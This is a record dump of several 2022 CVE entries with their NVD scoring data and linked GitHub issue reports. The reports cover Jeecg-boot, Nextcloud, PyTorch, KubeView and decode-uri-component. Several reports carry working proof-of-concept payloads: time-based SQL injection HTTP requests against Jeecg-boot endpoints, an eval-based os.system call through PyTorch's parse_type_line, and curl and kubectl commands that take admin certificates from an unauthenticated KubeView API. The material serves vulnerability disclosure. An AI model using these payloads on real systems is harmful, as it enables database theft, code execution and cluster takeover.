alt="截屏2022-10-25 15 43 20" src="https://user-images.githubusercontent.com/60163868/197713565-b959b45c-104e-4486-98e1-e65dd3aa62f3.png">
[CVE-2022-45207]这里有几处没有换成预编译,但个人建议修复
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4127/comments
6
2022-10-25T06:07:32Z
2022-12-07T00:59:38Z
https://github.com/jeecgboot/JeecgBoot/issues/4127
1,421,911,807
4,127
4,431
CVE-2022-45208
2022-11-25T17:15:11.173
Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component /sys/user/putRecycleBin.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://jeecg-boot.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4126" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://jeecg-boot.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4126" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "49DF84AE-6D1A-4065-AB0B-CB6926D6C5F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/4126
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
# sysUserMapper.xml revertLogicDeleted. You can see that no precompiling is performed <img width="1048" alt="截屏2022-10-25 11 40 04" src="https://user-images.githubusercontent.com/60163868/197676949-8016d0d1-9874-45fd-ba3f-89c63d8a2c90.png"> # SysUserController.java <img width="1278" alt="截屏2022-10-25 11 40 32" src="https://user-images.githubusercontent.com/60163868/197676991-1d2c1303-6b2c-4629-a4e3-32d4da435bb0.png"> # SysUserServiceImpl.java <img width="1201" alt="截屏2022-10-25 11 41 42" src="https://user-images.githubusercontent.com/60163868/197677147-41162874-a54a-462e-ab5f-0924e086c787.png"> So Users can pass in malicious parameters through http requests to achieve SQL injection # poc The website will return immediately when the following content is passed in <img width="1513" alt="截屏2022-10-25 11 43 33" src="https://user-images.githubusercontent.com/60163868/197677356-38bc1a03-a8cd-414a-8f8b-a8d1afc2a022.png"> After the following content is passed in, the website will return after a delay of 2 seconds <img width="1636" alt="截屏2022-10-25 11 43 57" src="https://user-images.githubusercontent.com/60163868/197677403-b693a283-5219-4d31-acd1-e6de9e403882.png"> # vuln attack can user this to get data from database # payload: PUT /jeecg-boot/sys/user/putRecycleBin HTTP/1.1 Host: 192.168.1.1:8088 Content-Length: 34 Request-Origion: Knife4j Accept: */* knife4j-gateway-code: ROOT X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Content-Type: application/json Origin: http://192.168.1.1:8088 Referer: http://192.168.1.1:8088/jeecg-boot/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection: close { "userIds": "a') OR SLEEP('2" } # patch In (${}) It seems that this cannot be modified to precompile So it is recommended to add some keywords such as')
[CVE-2022-45208]/sys/user/putRecycleBin is affected by sql injection
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4126/comments
2
2022-10-25T03:44:24Z
2022-12-07T01:05:07Z
https://github.com/jeecgboot/JeecgBoot/issues/4126
1,421,795,524
4,126
4,432
CVE-2022-45210
2022-11-25T17:15:11.230
Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component /sys/user/deleteRecycleBin.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://jeecg-boot.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4125" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://jeecg-boot.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4125" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "49DF84AE-6D1A-4065-AB0B-CB6926D6C5F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/4125
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
# sysUserMapper.xml deleteLogicDeleted. You can see that no precompiling is performed <img width="617" alt="截屏2022-10-25 11 04 50" src="https://user-images.githubusercontent.com/60163868/197672626-fb8257e3-ca86-484e-a4aa-e878ebb31c34.png"> # SysUserController.java <img width="811" alt="截屏2022-10-25 11 06 04" src="https://user-images.githubusercontent.com/60163868/197672755-b9609039-c01a-42c9-9fec-00adfb6c22fb.png"> # SysUserServiceImpl.java <img width="846" alt="截屏2022-10-25 11 06 35" src="https://user-images.githubusercontent.com/60163868/197672819-f5505608-26e4-4ba4-a7c5-ff6224d8ddce.png"> So Users can pass in malicious parameters through http requests to achieve SQL injection # poc The website will return immediately when the following content is passed in <img width="1617" alt="截屏2022-10-25 11 07 07" src="https://user-images.githubusercontent.com/60163868/197672893-82a45a08-2a8f-44ea-bde1-13e2e84044b6.png"> After the following content is passed in, the website will return after a delay of 2 seconds <img width="1656" alt="截屏2022-10-25 11 07 36" src="https://user-images.githubusercontent.com/60163868/197672953-bcf770b9-d5d9-4f19-a9ac-416e14aef6a6.png"> # vuln attack can user this to get data from database # payload: DELETE /jeecg-boot/sys/user/deleteRecycleBin?userIds=')+OR+SLEEP(2)+OR+id+IN+(' HTTP/1.1 Host: 192.168.1.1:8088 Content-Type: application/x-www-form-urlencoded Accept: */* knife4j-gateway-code: ROOT X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Request-Origion: Knife4j Origin: http://192.168.1.1:8088 Referer: http://192.168.1.1:8088/jeecg-boot/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection: close # patch In (${}) It seems that this cannot be modified to precompile So it is recommended to add some keywords such as')
[CVE-2022-45210]/sys/user/deleteRecycleBin is affected by sql injection
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4125/comments
2
2022-10-25T03:12:40Z
2022-12-07T01:16:36Z
https://github.com/jeecgboot/JeecgBoot/issues/4125
1,421,774,671
4,125
4,433
CVE-2022-39334
2022-11-25T19:15:11.350
Nextcloud also ships a CLI utility called nextcloudcmd which is sometimes used for automated scripting and headless servers. Versions of nextcloudcmd prior to 3.6.1 would incorrectly trust invalid TLS certificates, which may enable a Man-in-the-middle attack that exposes sensitive data or credentials to a network attacker. This affects the CLI only. It does not affect the standard GUI desktop Nextcloud clients, and it does not affect the Nextcloud server.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.9, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 2.5, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nextcloud/desktop/issues/4927" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/desktop/pull/5022" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-82xx-98xv-4jxv" }, { "source": "security-advisories@github.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://hackerone.com/reports/1699740" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nextcloud/desktop/issues/4927" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nextcloud/desktop/pull/5022" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-82xx-98xv-4jxv" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://hackerone.com/reports/1699740" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nextcloud:desktop:*:*:*:*:*:*:*:*", "matchCriteriaId": "A7633B29-D30E-483A-BDB1-41514D9358A6", "versionEndExcluding": "3.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/nextcloud/desktop/issues/4927
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nextcloud", "desktop" ]
### ⚠️ Before submitting, please verify the following: ⚠️ - [X] This is a **bug**, not a question or a configuration issue. - [X] This issue is **not** already reported on Github (I've searched it). - [X] Nextcloud Server and Desktop Client are **up to date**. See [Server Maintenance and Release Schedule](https://github.com/nextcloud/server/wiki/Maintenance-and-Release-Schedule) and [Desktop Releases](https://nextcloud.com/install/#install-clients) for supported versions. - [X] I agree to follow Nextcloud's [Code of Conduct](https://nextcloud.com/contribute/code-of-conduct/) ### Bug description I have a self hosted Nextcloud instance using my own private CA for TLS certs. When running `nextcloudcmd` without the `--trust`, it disregards the cert validation failure as "This is not an actual error" and proceeds with the sync anyway. I expected it to reject the untrusted server cert and assume it is a MITM attack: ``` # nextcloudcmd --non-interactive -n ~/Nextcloud https://nextcloud.lan 09-10 12:25:54:348 [ info nextcloud.sync.accessmanager ]: 2 "" "https://nextcloud.lan/ocs/v1.php/cloud/capabilities?format=json" has X-Request-ID "18ff47a0-a482-4456-a489-7aa747170c58" 09-10 12:25:54:348 [ info nextcloud.sync.networkjob ]: OCC::JsonApiJob created for "https://nextcloud.lan" + "ocs/v1.php/cloud/capabilities" "" 09-10 12:25:54:545 [ info nextcloud.sync.account ]: "SSL-Errors happened for url \"https://nextcloud.lan/ocs/v1.php/cloud/capabilities?format=json\" \tError in QSslCertificate(\"3\", [REDACTED] : \"The root certificate of the certificate chain is self-signed, and untrusted\" ( \"The root certificate of the certificate chain is self-signed, and untrusted\" ) \n " Certs are known and trusted! This is not an actual error. 09-10 12:25:54:871 [ info nextcloud.sync.networkjob.jsonapi ]: JsonApiJob of QUrl("https://nextcloud.lan/ocs/v1.php/cloud/capabilities?format=json") FINISHED WITH STATUS "OK" ``` After [adding the root CA cert to the system's trust store](https://ubuntu.com/server/docs/security-trust-store) the validation passes and the warning goes away. I am running the latest `nextcloud-desktop-cmd` package, version `2.6.2-1build1`, on Ubuntu Server 20.04.2 LTS. I did not see this problem in the [NextCloud CVE list](https://www.cvedetails.com/vulnerability-list/vendor_id-15913/product_id-34622/Nextcloud-Nextcloud.htm). ### Steps to reproduce Run `nextcloudcmd` against a server that has a TLS cert that the system won't validate. ### Expected behavior Abort the operation if the server's TLS cert cannot be validated, unless `--trust` is specified to explicitly override the security checks. ### Which files are affected by this bug src/libsync/account.cpp ### Operating system Linux ### Which version of the operating system you are running. Ubuntu 20.04.2 LTS ### Package Distro package manager ### Nextcloud Server version 24.0.3 ### Nextcloud Desktop Client version 2.6.2-1build1 ### Is this bug present after an update or on a fresh install? Fresh desktop client install ### Are you using the Nextcloud Server Encryption module? Encryption is Disabled ### Are you using an external user-backend? - [X] Default internal user-backend - [ ] LDAP/ Active Directory - [ ] SSO - SAML - [ ] Other ### Nextcloud Server logs _No response_ ### Additional info _No response_
[Bug]: nextcloudcmd incorrectly trusts bad TLS certs
https://api.github.com/repos/nextcloud/desktop/issues/4927/comments
3
2022-09-10T19:46:57Z
2025-01-17T06:07:19Z
https://github.com/nextcloud/desktop/issues/4927
1,368,715,169
4,927
4,434
CVE-2022-45907
2022-11-26T02:15:10.253
In PyTorch before trunk/89695, torch.jit.annotations.parse_type_line can cause arbitrary code execution because eval is used unsafely.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pytorch/pytorch/commit/767f6aa49fe20a2766b9843d01e3b7f7793df6a3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/pytorch/pytorch/issues/88868" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pytorch/pytorch/commit/767f6aa49fe20a2766b9843d01e3b7f7793df6a3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/pytorch/pytorch/issues/88868" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfoundation:pytorch:*:*:*:*:*:python:*:*", "matchCriteriaId": "17B8827A-469E-484D-845F-8DA235DB1BBA", "versionEndExcluding": "1.13.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/pytorch/pytorch/issues/88868
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "pytorch", "pytorch" ]
### 🐛 Describe the bug In `torch.jit.annotations`, it looks like there are some functions that are deprecated, but still retain code, which may lead to some backdoors, especially since some of these functions still use eval while implementing. But now I'm not sure if there are some features (jit decorator) in some version of pytorch are still using this function `parse_type_line` or `get_signature` which calls `parse_type_line`, if so, it can cause RCE, if not, maybe someone can also leave a backdoor by calling this function while writing code and share it to the people. ``` import torch torch.jit.annotations.parse_type_line('# type: __import__("os").system("ls") -> 234', None, 1) ``` ### Versions master cc @ezyang @gchanan @zou3519 @EikanWang @jgong5 @wenzhe-nrv @sanchitintel
`torch.jit.annotations.parse_type_line` is not safe (command injection) even it seems already deprecated.
https://api.github.com/repos/pytorch/pytorch/issues/88868/comments
16
2022-11-11T04:09:54Z
2022-12-16T21:06:00Z
https://github.com/pytorch/pytorch/issues/88868
1,444,898,821
88,868
4,435
CVE-2022-45933
2022-11-27T03:15:11.180
KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/benc-uk/kubeview/issues/95" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/benc-uk/kubeview/issues/95" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E7E24E4-AA8C-4708-98D2-C991863DBB12", "versionEndExcluding": null, "versionEndIncluding": "0.1.31", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "306" ]
306
https://github.com/benc-uk/kubeview/issues/95
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "benc-uk", "kubeview" ]
Hello, may you please consider **adding authentication** to **KubeView?** a `curl` to the the API for the `kube-system` namespace would return certificate files that can be used for authentication and **ultimately lead to taking full control over the k8s cluster!** the request would be like this: ```bash curl http://x.x.x.x/api/scrape/kube-system | jq | grep -P '(BEGIN|END) (RSA|CERT)' ``` and using the certs for auth like below: ```bash kubectl --client-certificate=adm.crt --client-key=adm.key --certificate-authority ca.crt --server https://x.x.x.x ``` Please fix this ASAP to make sure everyone who uses this is secure. Thanks in advance :)
[CVE-2022-45933] Critical Security Issue that could lead to full cluster takeover
https://api.github.com/repos/benc-uk/kubeview/issues/95/comments
5
2022-11-20T15:38:34Z
2025-05-31T17:00:05Z
https://github.com/benc-uk/kubeview/issues/95
1,456,946,197
95
4,436
CVE-2022-38900
2022-11-28T13:15:10.033
decode-uri-component 0.2.0 is vulnerable to Improper Input Validation resulting in DoS.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SamVerschueren/decode-uri-component/issues/5" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sindresorhus/query-string/issues/345" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ERN6YE3DS7NBW7UH44SCJBMNC2NWQ7SM/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KAC5KQ2SEWAMQ6UZAUBZ5KXKEOESH375/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QABOUA2I542UTANVZIVFKWMRYVHLV32D/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UW4SCMT3SEUFVIL7YIADQ5K36GJEO6I5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNV2GNZXOTEDAJRFH3ZYWRUBGIVL7BSU/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SamVerschueren/decode-uri-component/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sindresorhus/query-string/issues/345" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ERN6YE3DS7NBW7UH44SCJBMNC2NWQ7SM/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KAC5KQ2SEWAMQ6UZAUBZ5KXKEOESH375/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QABOUA2I542UTANVZIVFKWMRYVHLV32D/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UW4SCMT3SEUFVIL7YIADQ5K36GJEO6I5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNV2GNZXOTEDAJRFH3ZYWRUBGIVL7BSU/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:decode-uri-component_project:decode-uri-component:0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E5FAEFE5-8016-43E2-A600-46EC2CCAD87E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/SamVerschueren/decode-uri-component/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "SamVerschueren", "decode-uri-component" ]
Crash occured when `%ea%ba%5a%ba` is parsed by `decodeUriComponent` This function is used in some other nodejs projects for decoding query strings and hash strings in url, for example the hash `# kun%ea%ba%5a%ba` is valid and should be parsed correctly as `{ ' kun%ea%ba%5a%ba': null }` For example in chrome's development tools' console the url `https://google.com# kun%ea%ba%5a%ba` can be parsed without problems: ``` const url = new URL("https://google.com# kun%ea%ba%5a%ba"); url ``` ![image](https://user-images.githubusercontent.com/44156690/186367650-140a9395-1165-4c31-a51a-12fbf9b301ab.png) ### Code to reproduce ``` const decodeUriComponent = require('decode-uri-component'); var x = decodeUriComponent('%ea%ba%5a%ba'); console.log(x); ``` ### Results `TypeError: decodeComponents(...).join is not a function`
TypeError: decodeComponents(...).join is not a function
https://api.github.com/repos/SamVerschueren/decode-uri-component/issues/5/comments
2
2022-08-24T09:32:21Z
2022-12-01T21:48:16Z
https://github.com/SamVerschueren/decode-uri-component/issues/5
1,349,145,334
5
4,437
CVE-2022-38900
2022-11-28T13:15:10.033
decode-uri-component 0.2.0 is vulnerable to Improper Input Validation resulting in DoS.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SamVerschueren/decode-uri-component/issues/5" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sindresorhus/query-string/issues/345" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ERN6YE3DS7NBW7UH44SCJBMNC2NWQ7SM/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KAC5KQ2SEWAMQ6UZAUBZ5KXKEOESH375/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QABOUA2I542UTANVZIVFKWMRYVHLV32D/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UW4SCMT3SEUFVIL7YIADQ5K36GJEO6I5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNV2GNZXOTEDAJRFH3ZYWRUBGIVL7BSU/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/SamVerschueren/decode-uri-component/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sindresorhus/query-string/issues/345" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ERN6YE3DS7NBW7UH44SCJBMNC2NWQ7SM/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KAC5KQ2SEWAMQ6UZAUBZ5KXKEOESH375/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QABOUA2I542UTANVZIVFKWMRYVHLV32D/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UW4SCMT3SEUFVIL7YIADQ5K36GJEO6I5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNV2GNZXOTEDAJRFH3ZYWRUBGIVL7BSU/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:decode-uri-component_project:decode-uri-component:0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E5FAEFE5-8016-43E2-A600-46EC2CCAD87E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/sindresorhus/query-string/issues/345
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sindresorhus", "query-string" ]
